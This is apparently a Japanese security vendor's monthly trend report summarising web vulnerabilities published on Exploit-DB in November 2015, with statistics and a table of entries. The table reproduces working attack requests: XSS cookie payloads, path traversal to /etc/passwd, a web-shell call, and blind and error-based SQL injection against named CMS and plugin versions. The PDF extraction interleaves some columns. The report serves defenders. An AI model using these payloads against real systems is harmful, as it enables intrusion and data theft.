Untitled - Penta Security Systems Inc.

2015.11
EDB-Report
最新Web脆弱性トレンドレポート(2015.11)
2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2015年11月は、脆弱性報告件数が最近になって最も少ない期間でした。しかし、Exploit-DBの分析結果をみると、攻撃の難易度や危険度の側面では前月と比べ、相変わらず危険な様子を見せています。
特に、SQLインジェクション(SQL Injection)攻撃に対する脆弱性報告件数が最も多かったが、単なる攻撃の成功可否を聞くクエリーではなく、実際のサーバのデータを抽出する難易度の高い攻撃で、危険度も早急
対応を要する攻撃でした。該当脆弱性が発見されたソフトウェアを使用する管理者は入力値検証をさらに厳しくするセキュリティパッチおよびセキュアコーディングを実施して、SQLインジェクション攻撃にさらされるないよう
に注意が必要です。
脆弱性別件数
1. 脆弱性別件数
脆弱性カテゴリ
ローカルファイル挿入
(Local File Inclusion:LFI)
クロス サイト スクリプティング
(Cross Site Scripting : XSS)
SQL インジェクション
(SQL Injection)
合計
8
7
7
6
件数
6
3
5
6
4
3
3
7
2
16
1
0
ローカルファイル挿入
クロス サイト スクリプティング
SQL インジェクション
(Local File
(Cross Site Scripting :
(SQL Injection)
Inclusion:LFI)
XSS)
2. 危険度別件数
危険度
件数
割合
早急対応要
10
63%
高
5
31%
中
1
6%
合計
16
100%
危険度別分類
1
早急対応要
5
高
中
10
3. 攻撃実行の難易度別件数
難易度
件数
割合
難
4
25%
中
4
25%
易
8
50%
合計
16
100%
攻撃実行の難易度別件数
4
難
中
8
易
4
4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名
NXFilter
AlegroCart
ClipperCMS
WordPress
WP-Client
HumHub
YESWIKI
件数
4
4
3
2
1
1
1
合計
16
主なソフトウェア別脆弱性発生件数
5
4
4
4
NXFilter
3
3
2
AlegroCart
2
ClipperCMS
1
1
1
1
WordPress
0
WP-Client
Copyright 2015 Penta Security Systems Inc. All rights reserved
HumHub
YESWIKI
EDB-Report
最新Web脆弱性トレンドレポート(2015.11)
2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
危険度分類基準
早急対応要:攻撃が成功した場合システムへ侵入可
高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす
中:情報漏洩
攻撃実行難易度分類基準
難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得
するため、高度な攻撃コードを採用したパターン、知らされていない攻撃
コードを採用したパターンのいずれかに該当する
中:攻撃手法自体は難しくないが、迂回コードを採用したパターン
易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、
既知の攻撃コードを採用したパターンのいずれかに該当する
** 5件以上発生した主なソフトウェア別脆弱性の詳細情報
EDB 番号
脆弱性カテゴリ
攻撃難易度
危険度
Copyright 2015 Penta Security Systems Inc. All rights reserved
脆弱性名
ソフトウェア名
EDB-Report
最新Web脆弱性トレンドレポート(2015.11)
2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2015-11-06
EDB番号
38648
脆弱性カテゴリ
XSS
攻撃難易度
易
危険度
中
2015-11-06
38646
XSS
易
高
2015-11-06
38646
XSS
易
高
2015-11-06
38646
XSS
易
高
脆弱性名
WordPress My Calendar Plugin
2.4.10 - admin.php XSS 脆弱性
攻撃コード
POST /wordpress/wp-admin/admin.php?page=my-calendarcategories HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
_wpnonce=35ed9ab206&mode=add&category_id=4category_na
me=<script>alert(document.cookie)</script>&category_c
olor=&category_private=on&mc_default_category=on&mc_s
kip_holidays_category=on&save=Add Category &raquo;
NXFilter 3.0.3 /classifier,ruleset.jsp?action_flag=&page=1&kw=%22/%3
classifier,ruleset.jsp XSS 脆 E%3Cscript%3Ealert%28666%29%3C/script%3E&id=&domain=&
弱性
keyword=&points=
/report,daily.jsp?stime=2015%2F10%2F17&time_option=ye
sterday&user=%22/%3E%3Cscript%3Ealert%28String.fromCh
NXFilter 3.0.3 arCode%2872%29%2bString.fromCharCode%2869%29%2bString
report,daily.jsp XSS 脆弱性
.fromCharCode%2876%29%2bString.fromCharCode%2876%29%2
9%3C/script%3E
POST /category,custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
NXFilter 3.0.3 Chrome/16.0.912.75 Safari/535.7
category,custom.jsp XSS 脆弱性 Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
対象プログラム
対象環境
WordPress
WordPress My
Calendar Plugin
2.4.10
NXFilter
NXFilter 3.0.3
NXFilter
NXFilter 3.0.3
NXFilter
NXFilter 3.0.3
NXFilter
NXFilter 3.0.3
YESWIKI
YESWIKI 0.2
WordPress
WordPress WP
Fastest Cache
Plugin 0.8.4.8
ClipperCMS
ClipperCMS 1.3.0
ClipperCMS
ClipperCMS 1.3.0
description=<script>alert(666)</script>
2015-11-06
38645
XSS
易
高
2015-11-10
38665
LFI
中
早急対応要
2015-11-11
38678
SQL Injection
難
早急対応要
2015-11-16
2015-11-16
38729
38729
SQL Injection
SQL Injection
中
難
早急対応要
早急対応要
POST /category,custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
NXFilter 3.0.3 - user,user.jsp Chrome/16.0.912.75 Safari/535.7
XSS 脆弱性
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
description=<script>alert(666)</script>
/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&t
YESWIKI 0.2 - wakka.php LFI 脆
emplate=/../../../../../../../../../../../../etc/pass
弱性
wd
POST /wp-admin/adminajax.php?action=wpfc_wppolls_ajax_request HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
WordPress WP Fastest Cache
Chrome/16.0.912.75 Safari/535.7
Plugin 0.8.4.8 - adminAccept: */*
ajax.php SQL Injection 脆弱性 Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
ClipperCMS 1.3.0 - index.php
SQL Injection 脆弱性 (1)
ClipperCMS 1.3.0 - index.php
SQL Injection 脆弱性 (2)
poll_id=0 UNION (SELECT IF(substr(user_pass,1,1) =
CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID =
1)%20--%20
/manager/index.php?a=88&id=1 AND
IF(SUBSTRING(version(), 1,
1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5
seconds')),null) %23
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or
extractvalue(1,concat(0x7e,(SELECT concat(user) FROM
mysql.user limit 0,1))) -- &newpassword=0&passwordgenmethod=g&specifiedpassword=
&confirmpassword=&passwordnotifymethod=s&fullname=&em
ail=foo3%40example.com&oldemail=foo3%40example.com&ro
le=2&phone=&mobilephone=&fax=&state=&zip=&country=&do
b=&gender=&comment=&failedlogincount=0&blocked=0&bloc
keduntil=&blockedafter=&manager_language=english&mana
ger_login_startup=&allow_manager_access=1&allowed_ip=
&manager_theme=&filemanager_path=&upload_images=&defa
ult_upload_images=1&upload_media=&default_upload_medi
a=1&upload_flash=&default_upload_flash=1&upload_files
=&default_upload_files=1&upload_maxsize=&which_editor
=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_
editor_theme=&tinymce_custom_plugins=&tinymce_custom_
buttons1=&tinymce_custom_buttons2=&tinymce_custom_but
tons3=&tinymce_custom_buttons4=&tinymce_css_selectors
=&photo=&save=Submit+Query
Copyright 2015 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2015.11)
2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2015-11-16
EDB番号
38729
脆弱性カテゴリ
SQL Injection
攻撃難易度
難
危険度
早急対応要
脆弱性名
ClipperCMS 1.3.0 - index.php
SQL Injection 脆弱性 (3)
攻撃コード
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest&newpassword=0&passwordgenmethod
=g&specifiedpassword=&confirmpassword=&passwordnotify
method=s&fullname=&email=foo6%40example.com&oldemail=
foo3%40example.com&role=2&phone=&mobilephone=&fax=&st
ate=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user
limit 0,1), dob='0
&comment=&failedlogincount=0&blocked=0&blockeduntil=&
blockedafter=&manager_language=english&manager_login_
startup=&allow_manager_access=1&allowed_ip=&manager_t
heme=&filemanager_path=&upload_images=&default_upload
_images=1&upload_media=&default_upload_media=1&upload
_flash=&default_upload_flash=1&upload_files=&default_
upload_files=1&upload_maxsize=&which_editor=&editor_c
ss_path=&rb_base_dir=&rb_base_url=&tinymce_editor_the
me=&tinymce_custom_plugins=&tinymce_custom_buttons1=&
tinymce_custom_buttons2=&tinymce_custom_buttons3=&tin
ymce_custom_buttons4=&tinymce_css_selectors=&photo=&s
ave=Submit+Query
POST
対象プログラム
対象環境
ClipperCMS
ClipperCMS 1.3.0
AlegroCart
AlegroCart 1.2.8
AlegroCart
AlegroCart 1.2.8
AlegroCart
AlegroCart 1.2.8
AlegroCart
AlegroCart 1.2.8
WP-Client
WP-Client 3.8.7
HumHub
HumHub 0.11.2
and 0.20.0beta.2
/ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=r
eport_logs HTTP/1.1
Host:
2015-11-16
38728
LFI
易
AlegroCart 1.2.8 早急対応要
/ecommerce/AlegroCart_1.2.8/up
load/admin2/ LFI 脆弱性
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
2015-11-16
2015-11-16
38728
38727
LFI
SQL Injection
易
中
早急対応要
早急対応要
AlegroCart 1.2.8 - / LFI 脆弱
性
AlegroCart 1.2.8 /ecommerce/AlegroCart_1.2.82/upload/admin2/ SQL Injection
脆弱性
directory=error_log&file_path=/etc/passwd&decrytion=0
/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2
.8/upload/logs/error_log/var/www/ecommerce/AlegroCart
_1.2.8/upload/logs/error_log/../../../../../../../etc
/passwd
POST /pages/en/files-manager-administration/addfile?path=home HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="file";
filename="image.jpg' AND IF(SUBSTRING(version(), 1,
1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5
seconds')),null) -- -"
Content-Type: image/jpeg
img
-----------------------------7dd10029908f2--
2015-11-16
2015-11-24
2015-11-30
38727
38803
38831
SQL Injection
XSS
SQL Injection
中
易
難
早急対応要
高
早急対応要
/ecommerce/AlegroCart_1.2.8AlegroCart 1.2.8 2/upload/?controller=checkout_process&method=return&t
/ecommerce/AlegroCart_1.2.8x=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(),
2/upload/ SQL Injection 脆弱性 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5
seconds')),null) %23)
WP-Client 3.8.7 /portal/request-estimate/ XSS
脆弱性
HumHub 0.11.2 and 0.20.0beta.2 - index.php SQL
Injection 脆弱性
POST /portal/request-estimate/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Requ
est+Estimate+from+2015-1112&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D
=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescript
ion%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bqu
antity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%
5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3
Ealert%281%29%3C%2Fscript%3E
/humhub/humhub0.11.2/index.php?r=directory/directory/stream&limit=4
&filters=entry_mine,visibility_public,&sort=c&from=5
AND (SELECT 7208 FROM(SELECT
COUNT(*),CONCAT(0x7170627671,(SELECT
(ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
x)a)&mode=normal
Copyright 2015 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2015.11)
2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
危険度
脆弱性名
Copyright 2015 Penta Security Systems Inc. All rights reserved
攻撃コード
対象プログラム
対象環境